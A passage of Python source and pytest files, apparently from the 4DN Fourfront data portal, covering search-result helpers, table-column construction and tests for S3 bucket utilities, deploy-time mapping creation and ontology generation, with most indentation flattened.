subreq = make_search_subreq(request, '{}?{}'.format(search_path, urlencode(param_lists, True)) )
return iter_search_results(None, subreq, **kwargs)
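# Illustration only (not part of the original module): the docstring above suggests
# flattening the chunked generator with itertools.chain.from_iterable; `request` is
# a Pyramid request supplied by the caller and the query params are fabricated.
def _example_iterate_all_search_results(request):
    from itertools import chain
    chunks = get_iterable_search_results(request, search_path='/search/',
                                         param_lists={'type': ['Biosample']})
    return chain.from_iterable(chunks)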
# Update? used in ./batch_download.py
def iter_search_results(context, request, **kwargs):
return search(context, request, return_generator=True, **kwargs)
def build_table_columns(request, schemas, doc_types):
any_abstract_types = 'Item' in doc_types
if not any_abstract_types:  # Check explicitly-defined types to see if any are abstract.
type_infos = [ request.registry[TYPES][type] for type in doc_types if type != 'Item' ]
for ti in type_infos:
# We use `type` instead of `isinstance` since we don't want to catch subclasses.
if type(ti) == AbstractTypeInfo:
any_abstract_types = True
break
columns = OrderedDict()
# Add title column, at beginning always
columns['display_title'] = {
"title" : "Title",
"order" : -100,
"type": "string"
}
# Add type column if any abstract types in search
current_action = request.normalized_params.get('currentAction')
if any_abstract_types and current_action != 'selection' and current_action != 'multiselect':
columns['@type'] = {
"title" : "Item Type",
"colTitle" : "Type",
"order" : -80,
"description" : "Type or category of Item",
"type": "string",
"tooltip": True
# Alternative below, if we want type column to be available but hidden by default in selection mode:
# "default_hidden": request.normalized_params.get('currentAction') == 'selection'
}
for schema in schemas:
if 'columns' in schema:
schema_columns = OrderedDict(schema['columns'])
# Add all columns defined in schema
for name, obj in schema_columns.items():
if name not in columns:
columns[name] = obj
else:
# If @type or display_title etc. column defined in schema, then override defaults.
for prop in schema_columns[name]:
columns[name][prop] = schema_columns[name][prop]
# Add description and data type from field schema, if none otherwise.
if not columns[name].get('description') or not columns[name].get('type'):
field_schema = schema_for_field(name, request, doc_types)
if field_schema:
if not columns[name].get('description') and field_schema.get('description') is not None:
columns[name]['description'] = field_schema['description']
if not columns[name].get('type') and field_schema.get('type') is not None:
columns[name]['type'] = field_schema['type']
# add tooltip
if columns[name].get('tooltip') is None:
columns[name]['tooltip'] = True
# iterate through sort_fields and set data type from schema if not already defined
if 'sort_fields' in columns[name]:
sort_fields = columns[name].get('sort_fields')
for sort_field in sort_fields:
if not sort_field.get('type') and sort_field.get('field') is not None:
sort_field_schema = schema_for_field(sort_field.get('field'), request, doc_types)
if sort_field_schema.get('type') is not None:
sort_field['type'] = sort_field_schema.get('type')
# Add status column, if not present, at end.
if 'status' not in columns:
columns['status'] = {
"title" : "Status",
"default_hidden" : True,
"order" : 501,
"type" : "string"
}
# Add created date column, if not present, at end.
if 'date_created' not in columns:
columns['date_created'] = {
"title" : "Date Created",
"default_hidden" : True,
"order" : 510,
"type" : "date"
}
# Add modified date column, if not present, at end.
if 'last_modified.date_modified' not in columns:
columns['last_modified.date_modified'] = {
"title" : "Date Modified",
"default_hidden" : True,
"order" : 520,
"type" : "date"
}
return columns
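# Illustration only (not part of the original module): before any schema-level
# overrides, entries in the OrderedDict returned by build_table_columns() look like
# the hard-coded defaults above, e.g.:
#
#     columns['display_title'] == {'title': 'Title', 'order': -100, 'type': 'string'}
#     columns['status'] == {'title': 'Status', 'default_hidden': True, 'order': 501, 'type': 'string'}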
_ASSEMBLY_MAPPER = {
'GRCh38-minimal': 'hg38',
'GRCh38': 'hg38',
'GRCh37': 'hg19',
'GRCm38': 'mm10',
'GRCm37': 'mm9',
'BDGP6': 'dm4',
'BDGP5': 'dm3',
'WBcel235': 'WBcel235'
}
hgConnect = ''.join([
'http://genome.ucsc.edu/cgi-bin/hgTracks',
'?hubClear=',
])
```
#### File: tests/acceptance/test_dcicutils.py
```python
import pytest
import requests
from dcicutils.env_utils import get_bucket_env, is_stg_or_prd_env, get_standard_mirror_env
from dcicutils.misc_utils import find_association
from dcicutils.s3_utils import s3Utils
pytestmark = [pytest.mark.working, pytest.mark.integrated]
_S3_UTILS_BUCKET_VAR_DATA = [
{
'attribute': 'sys_bucket',
'health_key': 'system_bucket',
'description': "The 'xxx-system' bucket",
'template': 'SYS_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'outfile_bucket',
'health_key': 'processed_file_bucket',
'description': "The 'xxx-wfoutput' bucket",
'template': 'OUTFILE_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'raw_file_bucket',
'health_key': 'file_upload_bucket',
'description': "The 'xxx-files' bucket",
'template': 'RAW_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'blob_bucket',
'health_key': 'blob_bucket',
'description': "The 'xxx-blobs' bucket",
'template': 'BLOB_BUCKET_TEMPLATE',
'recent': False,
},
{
'attribute': 'metadata_bucket',
'health_key': 'metadata_bucket',
'description': "The 'xxx-metadata-bundles' bucket",
'template': 'METADATA_BUCKET_TEMPLATE',
'recent': True,
},
{
'attribute': 'tibanna_output_bucket',
'health_key': 'tibanna_output_bucket',
'description': "The 'tibanna-output' bucket",
'template': 'TIBANNA_OUTPUT_BUCKET_TEMPLATE',
'recent': True,
},
{
'attribute': 'tibanna_cwl_bucket',
'health_key': 'tibanna_cwl_bucket',
'description': "The 'tibanna-cwl' bucket",
'template': 'TIBANNA_CWL_BUCKET_TEMPLATE',
'recent': True,
},
]
def _health_page(*, url):
return requests.get(url+"/health?format=json").json()
def _apply_s3_bucket_name_template(template, arg):
if '%' in template:
return template % arg
else:
return template
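# Illustration only (not part of the original tests): the helper above substitutes the
# environment into templates containing a '%s' placeholder and returns literal
# templates unchanged. The template strings below are fabricated examples.
def _example_apply_s3_bucket_name_template():
    assert _apply_s3_bucket_name_template('elasticbeanstalk-%s-system', 'fourfront-mastertest') == \
        'elasticbeanstalk-fourfront-mastertest-system'
    assert _apply_s3_bucket_name_template('some-literal-bucket-name', 'fourfront-mastertest') == \
        'some-literal-bucket-name'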
_PRD_URL = "https://data.4dnucleome.org"
_STG_URL = "http://staging.4dnucleome.org"
def _test_stg_or_prd(*, me, my_twin, env_from_beanstalk, s3utils):
assert s3utils.url == me
mirror_env = get_standard_mirror_env(env_from_beanstalk)
mirror_s = s3Utils(env=mirror_env)
assert mirror_s.url == my_twin
mirror_health = _health_page(url=mirror_s.url)
assert mirror_health['beanstalk_env'] == mirror_env
assert get_standard_mirror_env(mirror_env) == env_from_beanstalk
def _test_data(*, env_from_beanstalk, s3utils):
_test_stg_or_prd(me=_PRD_URL, my_twin=_STG_URL, env_from_beanstalk=env_from_beanstalk, s3utils=s3utils)
def _test_staging(*, env_from_beanstalk, s3utils):
_test_stg_or_prd(me=_STG_URL, my_twin=_PRD_URL, env_from_beanstalk=env_from_beanstalk, s3utils=s3utils)
@pytest.mark.parametrize('env', [None, 'fourfront-mastertest', 'fourfront-green', 'fourfront-blue', 'data', 'staging'])
def test_s3_utils_bare(env):
# Calling without an env argument or explicit bucket names is only expected to work
# in orchestrated environments with a single environment.
s = s3Utils(env=env)
# No matter where invoked, we should at least get an AWS s3 object
assert s.s3
# This is probably the same everywhere. It doesn't need to vary.
assert s.ACCESS_KEYS_S3_KEY == 'access_key_admin'
for datum in _S3_UTILS_BUCKET_VAR_DATA:
attr_name = datum['attribute']
template_name = datum['template']
# This is behavior we don't want, but it's the normal behavior, so test stability.
# e.g., for env=None, assert s.sys_bucket == 'elasticbeanstalk-None-system'
# but for env='fourfront-mastertest', assert s.sys_bucket == 'elasticbeanstalk-fourfront-mastertest-system'
if hasattr(s, attr_name) and hasattr(s, template_name):
assert getattr(s, attr_name) == _apply_s3_bucket_name_template(getattr(s, template_name),
get_bucket_env(env))
else:
assert datum['recent'], f"Problem with: {datum}"
# As of dcicutils 2.3.0 or 2.3.1 (there was a bug fix in the initial patch),
# the .url is expected to always be set for beanstalk environments, even ones
# that are not stg/prd. But it's still the case that you can call s3Utils(env=None)
# and get back an object that has some things filled even though the bucket names
# are nonsensical and the env is None.
if env:
assert s.url != ''
health = _health_page(url=s.url)
for k, v in health.items():
if k.endswith("bucket"):
print(f"Considering health page key {k}...")
entry = find_association(_S3_UTILS_BUCKET_VAR_DATA, health_key=k)
assert entry, f"No entry for health key {k}."
if v:
assert getattr(s, entry['attribute']) == v
print("Attribute matches.")
else:
print("No health page value.")
env_from_beanstalk = health['beanstalk_env']
if is_stg_or_prd_env(env):
if env == 'data':
_test_data(env_from_beanstalk=env_from_beanstalk, s3utils=s)
elif env == 'staging':
_test_staging(env_from_beanstalk=env_from_beanstalk, s3utils=s)
elif is_stg_or_prd_env(env):
assert env_from_beanstalk == env
if s.url == _PRD_URL:
_test_data(env_from_beanstalk=env_from_beanstalk, s3utils=s)
else:
_test_staging(env_from_beanstalk=env_from_beanstalk, s3utils=s)
```
#### File: encoded/tests/test_batch_download.py
```python
import pytest
from dcicutils.qa_utils import notice_pytest_fixtures
from ..util import delay_rerun
# Use workbook fixture from BDD tests (including elasticsearch)
from .workbook_fixtures import app_settings, app, workbook
# NOTE WELL: app-settings and app are not used here explicitly but are probably still needed.
# See longer explanation at top of test_aggregation.py -kmp 28-Jun-2020
notice_pytest_fixtures(app_settings, app, workbook)
pytestmark = [# pytest.mark.indexing,
pytest.mark.workbook,
pytest.mark.flaky(rerun_filter=delay_rerun)]
@pytest.mark.skip(reason="update data when we have a working experiment")
def test_report_download(testapp, workbook):
notice_pytest_fixtures(testapp, workbook)
res = testapp.get('/report.tsv?type=Experiment&sort=accession')
assert res.headers['content-type'] == 'text/tsv; charset=UTF-8'
disposition = res.headers['content-disposition']
assert disposition == 'attachment;filename="report.tsv"'
lines = res.body.splitlines()
assert lines[0].split(b'\t') == [
b'ID', b'Accession', b'Assay Type', b'Assay Nickname', b'Target',
b'Biosample', b'Description', b'Lab', b'Project', b'Status',
b'Linked Antibody', b'Species', b'Life stage', b'Age', b'Age Units',
b'Treatment', b'Term ID', b'Concentration', b'Concentration units',
b'Duration', b'Duration units', b'Synchronization',
b'Post-synchronization time', b'Post-synchronization time units',
b'Replicates', b'Files', b'Dbxrefs'
]
assert lines[1].split(b'\t') == [
b'/experiments/ENCSR000AAL/', b'ENCSR000AAL', b'RNA-seq', b'RNA-seq',
b'', b'K562', b'RNA Evaluation K562 Small Total RNA-seq from Gingeras',
b'<NAME>, CSHL', b'ENCODE', b'released', b'',
b'', b'', b'', b'', b'', b'', b'', b'', b'',
b'', b'', b'', b'', b'', b'', b''
]
assert len(lines) == 44
```
#### File: encoded/tests/test_create_mapping.py
```python
import pytest
from dcicutils.deployment_utils import CreateMappingOnDeployManager
from dcicutils.qa_utils import notice_pytest_fixtures
from snovault import COLLECTIONS, TYPES
from snovault.elasticsearch.create_mapping import type_mapping, run as run_create_mapping
from snovault.util import add_default_embeds
from unittest.mock import patch, MagicMock
from .datafixtures import ORDER
from .workbook_fixtures import workbook, app_settings, app
from ..commands import create_mapping_on_deploy
from ..commands.create_mapping_on_deploy import (
ITEM_INDEX_ORDER,
_run_create_mapping # noqa - yeah, it's internal but we want to test it
)
# TODO: We should not be importing *. Even stranger, PyCharm says we don't use anything from there. -kmp 14-Feb-2020
# Experimentally commenting this out. -kmp 28-Jun-2020
# from ..types.experiment import *
pytestmark = [pytest.mark.setone, pytest.mark.working]
# Using workbook inserts - required for test_run_create_mapping_with_upgrader
notice_pytest_fixtures(app_settings, app, workbook)
@pytest.mark.parametrize('item_type', ORDER)
def test_create_mapping(registry, item_type):
"""
This test does not actually use elasticsearch
Only tests the mappings generated from schemas
"""
mapping = type_mapping(registry[TYPES], item_type)
assert mapping
type_info = registry[TYPES].by_item_type[item_type]
schema = type_info.schema
embeds = add_default_embeds(item_type, registry[TYPES], type_info.embedded_list, schema)
# assert that all embeds exist in mapping for the given type
for embed in embeds:
mapping_pointer = mapping
split_embed = embed.split('.')
for idx, split_ in enumerate(split_embed):
# see if this is last level of embedding- may be a field or object
if idx == len(split_embed) - 1:
if 'properties' in mapping_pointer and split_ in mapping_pointer['properties']:
final_mapping = mapping_pointer['properties']
else:
final_mapping = mapping_pointer
if split_ != '*':
assert split_ in final_mapping
else:
assert 'properties' in final_mapping or final_mapping.get('type') == 'object'
else:
assert split_ in mapping_pointer['properties']
mapping_pointer = mapping_pointer['properties'][split_]
def test_create_mapping_item_order(registry):
# make sure every item type name is represented in the item ordering
for i_type in registry[COLLECTIONS].by_item_type:
# ignore "testing" types
if i_type.startswith('testing_'):
continue
assert registry[COLLECTIONS][i_type].type_info.name in ITEM_INDEX_ORDER
class MockedCommandArgs:
def __init__(self, wipe_es=None, skip=None, strict=None, clear_queue=None):
self.wipe_es = wipe_es
self.skip = skip
self.strict = strict
self.clear_queue = clear_queue
class MockedLog:
def __init__(self):
self.log = []
def info(self, msg):
self.log.append(('info', msg))
def error(self, msg):
self.log.append(('error', msg))
# These next are more extensively tested in dcicutils.
# This is just plausibility checking that we've received things OK.
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-blue'))
def test_get_deployment_config_staging():
""" Tests get_deployment_config in the new staging case """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-blue'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is False
assert cfg['WIPE_ES'] is True
assert cfg['STRICT'] is True
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-green'))
def test_get_deployment_config_prod():
""" Tests get_deployment_config in the new production case """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-green'
with pytest.raises(RuntimeError):
CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-hotseat'))
def test_get_deployment_config_hotseat():
""" Tests get_deployment_config in the hotseat case with a new-style ecosystem. """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-hotseat'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is True # The other values (WIPE_ES and STRICT) don't matter if this is set.
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
def test_get_deployment_config_mastertest():
""" Tests get_deployment_config in the hotseat case with a new-style ecosystem. """
my_env = create_mapping_on_deploy.get_my_env('ignored-for-mock')
assert my_env == 'fourfront-mastertest'
cfg = CreateMappingOnDeployManager.get_deploy_config(env=my_env, args=MockedCommandArgs(), log=MockedLog())
assert cfg['ENV_NAME'] == my_env # sanity
assert cfg['SKIP'] is False
assert cfg['WIPE_ES'] is True
assert cfg['STRICT'] is False
class Simulation:
def __init__(self, mocked_app, expect_check_first=False, expect_purge_queue=False, expect_strict=False):
self.run_has_been_called = False
self.mocked_app = mocked_app
self.expect_check_first = expect_check_first
self.expect_purge_queue = expect_purge_queue
self.expect_strict = expect_strict
def __str__(self):
return ("<{cls} run {called} expecting cf={cf} pq={pq} es={es} {id}>"
.format(cls=self.__class__.__name__, called="CALLED" if self.run_has_been_called else "UNCALLED",
cf=self.expect_check_first, pq=self.expect_purge_queue, es=self.expect_strict, id=id(self)))
def __repr__(self):
return self.__str__()
def mocked_run_create_mapping(self, app, check_first=False, strict=False, purge_queue=False, item_order=None,
**kwargs):
self.run_has_been_called = True
assert kwargs == {}, "mocked_run_create_mapping needs adjusting. It doesn't expect these keywords: %s" % kwargs
assert app == self.mocked_app, "Mocked app was not as expected: %s" % app
# check_first is (not WIPE_ES)
assert check_first is self.expect_check_first, "check_first was not as expected: %s" % check_first
# purge_queue is whether --clear-queue was in command args
assert bool(purge_queue) is self.expect_purge_queue, (
    "purge_queue was not as expected. purge_queue=%s" % purge_queue)
# This should be a constant for our purposes
assert item_order == ITEM_INDEX_ORDER, "item_order was not as expected: %s" % item_order
# strict is the STRICT argument
assert strict is self.expect_strict, "strict was not as expected: %s" % strict
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_production(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app) # Expectations don't matter because we're not expecting to get called.
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 1
assert simulation.run_has_been_called is False
assert mocked_log.log == [
('info', 'Environment fourfront-green is currently the production environment.'
' Something is definitely wrong. We never deploy there, we always CNAME swap.'
' This deploy cannot proceed. DeploymentFailure will be raised.'),
('error', 'Exception encountered while gathering deployment information or running create_mapping'),
('error', 'DeploymentFailure: Tried to run create_mapping_on_deploy on production.'),
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-blue'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_staging(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=False, expect_strict=True)
mocked_log = create_mapping_on_deploy.log
exit_condition = None
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
exit_condition = e
print(exit_condition)
except Exception as e:
print("log =", mocked_log.log)
raise AssertionError("Unexpected error exit (%s): %s" % (e.__class__.__name__, e))
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-blue is currently the staging environment. Processing mode: STRICT,WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-blue.')
]
assert exit_condition, "Unexpected non-error exit."
assert exit_condition.code == 0
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-hotseat'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_hotseat(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app) # Expectations don't matter because we're not expecting to get called.
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is False
assert mocked_log.log == [
('info', 'Environment fourfront-hotseat is a hotseat test environment. Processing mode: SKIP'),
('info', 'NOT calling run_create_mapping for env fourfront-hotseat.')
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_mastertest(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=False, expect_strict=False)
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs())
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-mastertest is a non-hotseat test environment. Processing mode: WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-mastertest.')
]
@patch('encoded.commands.create_mapping_on_deploy.log', MockedLog())
@patch('dcicutils.deployment_utils.compute_ff_prd_env', MagicMock(return_value='fourfront-green'))
@patch('encoded.commands.create_mapping_on_deploy.get_my_env', MagicMock(return_value='fourfront-mastertest'))
@patch('encoded.commands.create_mapping_on_deploy.run_create_mapping')
def test_run_create_mapping_mastertest_with_clear_queue(mock_run_create_mapping, app):
simulation = Simulation(mocked_app=app, expect_check_first=False, expect_purge_queue=True, expect_strict=False)
mocked_log = create_mapping_on_deploy.log
try:
mock_run_create_mapping.side_effect = simulation.mocked_run_create_mapping
_run_create_mapping(app, MockedCommandArgs(clear_queue=True))
except SystemExit as e:
print(e)
assert e.code == 0
assert simulation.run_has_been_called is True
assert mocked_log.log == [
('info', 'Environment fourfront-mastertest is a non-hotseat test environment. Processing mode: WIPE_ES'),
('info', 'Calling run_create_mapping for env fourfront-mastertest.')
]
@patch("snovault.elasticsearch.indexer_queue.QueueManager.add_uuids")
def test_run_create_mapping_with_upgrader(mock_add_uuids, testapp, workbook):
"""
Test for catching items in need of upgrading when running
create_mapping.
Indexer queue method mocked to check correct calls, so no items
actually indexed/upgraded.
"""
app = testapp.app
type_to_upgrade = "Biosample"
search_query = "/search/?type=" + type_to_upgrade + "&frame=object"
search = testapp.get(search_query, status=200).json["@graph"]
item_type_uuids = sorted([x["uuid"] for x in search])
# No schema version change, so nothing needs indexing
run_create_mapping(app, check_first=True)
(_, uuids_to_index), _ = mock_add_uuids.call_args
assert not uuids_to_index
# Change schema version in registry so all posted items of this type
# "need" to be upgraded
registry_schema = app.registry[TYPES][type_to_upgrade].schema
schema_version_default = registry_schema["properties"]["schema_version"]["default"]
updated_schema_version = str(int(schema_version_default) + 1)
registry_schema["properties"]["schema_version"]["default"] = updated_schema_version
run_create_mapping(app, check_first=True)
(_, uuids_to_index), _ = mock_add_uuids.call_args
assert sorted(uuids_to_index) == item_type_uuids
# Revert item type schema version
registry_schema["properties"]["schema_version"]["default"] = schema_version_default
```
#### File: encoded/tests/test_fourfront_submission.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
# test that the right fields are in place for metadata submission on FF.
# specifically, a valid submits_for lab and valid award
def test_user_with_submitter(testapp, submitter):
assert len(submitter['submits_for']) > 0
lab = submitter['submits_for'][0]['@id']
lab_res = testapp.get(lab, status=200)
assert len(lab_res.json['awards']) > 0
award = lab_res.json['awards'][0]['@id']
testapp.get(award, status=200)
```
#### File: encoded/tests/test_generate_ontology.py
```python
import json
import os
import pytest
from collections import OrderedDict
from rdflib import URIRef
from unittest import mock
from ..commands import generate_ontology as go
from ..commands.owltools import Owler
pytestmark = [pytest.mark.setone, pytest.mark.working]
def test_parse_args_defaults():
args = []
args = go.parse_args(args)
assert args.ontology == 'all'
assert args.key is None
assert args.env == 'data'
@pytest.fixture
def connection():
return {
"server": "https://data.4dnucleome.org/",
"key": "testkey",
"secret": "testsecret"
}
@pytest.fixture
def slim_terms():
return [
{
"uuid": "111119bc-8535-4448-903e-854af460a233",
"term_name": "ectoderm",
"term_id": "UBERON:0000924",
"is_slim_for": "developmental",
},
{
"uuid": "111122bc-8535-4448-903e-854af460a233",
"preferred_name": "3D chromatin structure",
"term_name": "chromosome conformation identification objective",
"term_id": "OBI:0001917",
"is_slim_for": "assay"
}
]
def test_connect2server(connection):
# parameters we pass in don't really matter
key = "{'server': 'https://data.4dnucleome.org/', 'key': 'testkey', 'secret': 'testsecret'}"
with mock.patch('encoded.commands.generate_ontology.get_authentication_with_server', return_value=connection):
retval = go.connect2server(None, key)
assert retval == connection
# see ontology schema for full schema
# now synonym_terms and definition_terms are fully embedded
all_ontology = [{'download_url': 'http://www.ebi.ac.uk/efo/efo_inferred.owl',
'synonym_terms': [
'/ontology-terms/111111bc-8535-4448-903e-854af460a233/',
'/ontology-terms/111112bc-8535-4448-903e-854af460a233/'],
'@id': '/ontologys/530006bc-8535-4448-903e-854af460b254/',
'@type': ['Ontology', 'Item'],
'definition_terms': [
'/ontology-terms/111115bc-8535-4448-903e-854af460a233/',
'/ontology-terms/111116bc-8535-4448-903e-854af460a233/'],
'namespace_url': 'http://www.ebi.ac.uk/efo/',
'ontology_prefix': 'EFO',
'uuid': '530006bc-8535-4448-903e-854af460b254',
'ontology_name': 'Experimental Factor Ontology'
},
{'ontology_name': 'Uberon',
'@type': ['Ontology', 'Item'],
'ontology_prefix': 'UBERON',
'namespace_url': 'http://purl.obolibrary.org/obo/',
'download_url': 'http://purl.obolibrary.org/obo/uberon/composite-metazoan.owl',
'@id': '/ontologys/530016bc-8535-4448-903e-854af460b254/',
'definition_terms': ['/ontology-terms/111116bc-8535-4448-903e-854af460a233/'],
'uuid': '530016bc-8535-4448-903e-854af460b254',
},
{'ontology_name': 'Ontology for Biomedical Investigations',
'@type': ['Ontology', 'Item'],
'ontology_prefix': 'OBI',
'namespace_url': 'http://purl.obolibrary.org/obo/',
'download_url': 'http://purl.obolibrary.org/obo/obi.owl',
'@id': '/ontologys/530026bc-8535-4448-903e-854af460b254/',
'definition_terms': [
{'term_name': 'definition',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000115',
'@id': '/ontology-terms/111116bc-8535-4448-903e-854af460a233/',
'uuid': '111116bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000115'
}
],
'uuid': '530026bc-8535-4448-903e-854af460b254',
'synonym_terms': [
{'term_name': 'alternative term',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000118',
'@id': '/ontology-terms/111117bc-8535-4448-903e-854af460a233/',
'uuid': '111117bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000118'
},
{'term_name': 'alternative term',
'@type': ['OntologyTerm', 'Item'],
'term_id': 'IAO:0000118',
'@id': '/ontology-terms/111117bc-8535-4448-903e-854af460a233/',
'uuid': '111117bc-8535-4448-903e-854af460a233',
'term_url': 'http://purl.obolibrary.org/obo/IAO_0000118'
}
]
}]
def get_fdn_ontology_side_effect(*args, **kwargs):
for i, arg in enumerate(args):
print('ARG', i, ' = ', arg)
if args[0] is not None:
return all_ontology[0]
else:
return all_ontology
def test_get_ontologies_all(connection):
prefixes = ['EFO', 'UBERON', 'OBI']
with mock.patch('encoded.commands.generate_ontology.search_metadata', return_value=all_ontology):
ont_list = 'all'
ontologies = go.get_ontologies(connection, ont_list)
assert len(ontologies) == 3
for ont in ontologies:
assert ont['ontology_prefix'] in prefixes
def test_get_ontologies_one(connection):
prefix = 'EFO'
with mock.patch('encoded.commands.generate_ontology.get_metadata', side_effect=get_fdn_ontology_side_effect):
ont_list = 'EFO'
ontologies = go.get_ontologies(connection, ont_list)
assert len(ontologies) == 1
assert ontologies[0]['ontology_prefix'] == prefix
def test_get_ontologies_not_in_db(connection):
prefix = 'EFO'
all_ontology.append({'@type': ['Error', 'Item'], 'ontology_prefix': 'FAKE'})
with mock.patch('encoded.commands.generate_ontology.get_metadata',
return_value={'@type': ['Error', 'Item'], 'ontology_prefix': 'FAKE'}):
ont_list = 'FAKE'
ontologies = go.get_ontologies(connection, ont_list)
assert not ontologies
@pytest.fixture
def slim_term_list():
# see ontology_term schema for full schema
return [{'term_id': 'a_term1', 'uuid': 'uuida1', 'is_slim_for': 'assay'},
{'term_id': 'a_term2', 'uuid': 'uuida2', 'is_slim_for': 'assay'},
{'term_id': 'd_term1', 'uuid': 'uuidd1', 'is_slim_for': 'developmental'}]
@pytest.fixture
def slim_terms_by_ont(slim_term_list):
return [
[slim_term_list[0],
slim_term_list[1]],
[slim_term_list[2]],
None,
None,
None
]
@pytest.fixture
def term_w_closure():
return {'term_id': '1', 'uuid': 'uuid1',
'closure': ['id1', 'id2', 'a_term1']}
@pytest.fixture
def terms_w_closures(term_w_closure):
# term with 2 slims
term_w_two = term_w_closure.copy()
term_w_two['term_id'] = '4'
term_w_two['uuid'] = 'uuid2'
term_w_two['closure'] = term_w_closure['closure'].copy()
term_w_two['closure'].append('a_term2')
# term w closure but no slim terms
term_wo_slim = term_w_closure.copy()
term_wo_slim['term_id'] = '5'
term_wo_slim['uuid'] = 'uuid5'
term_wo_slim['closure'] = term_w_closure['closure'].copy()
term_wo_slim['closure'].pop()
# term with both 'closure' and 'closure_with_develops_from', each containing the same slim
term_with_both = term_w_closure.copy()
term_with_both['term_id'] = '3'
term_with_both['uuid'] = 'uuid3'
term_with_both['closure_with_develops_from'] = ['d_term1']
print(term_with_both)
# term with a 'closure_with_develops_from' slim term
term_cwdf = term_with_both.copy()
term_cwdf['term_id'] = '2'
term_cwdf['uuid'] = 'uuid2'
del term_cwdf['closure']
# term with no closures
term_w_none = term_cwdf.copy()
term_w_none['term_id'] = '6'
term_w_none['uuid'] = 'uuid6'
del term_w_none['closure_with_develops_from']
return [term_w_closure, term_cwdf, term_with_both,
term_w_two, term_wo_slim, term_w_none]
@pytest.fixture
def terms():
return {
'a_term1': {
'term_id': 'a_term1',
'term_name': 'name1',
'all_parents': []
},
'id2': {
'term_id': 'id2',
'term_name': 'name2',
'parents': ['a_term1', 'ObsoleteClass'],
'all_parents': ['a_term1']
},
'id3': {
'term_id': 'id3',
'term_name': 'obsolete name',
'relationships': ['id2'],
'all_parents': ['id2']
},
'id4': {
'term_id': 'id4',
'term_name': 'Obsolete name',
'relationships': ['a_term1', 'id2'],
'all_parents': ['a_term11', 'id2']
},
'd_term1': {
'term_id': 'd_term1',
'term_name': '',
'all_parents': ['id4']
},
'id6': {
'term_id': 'id6',
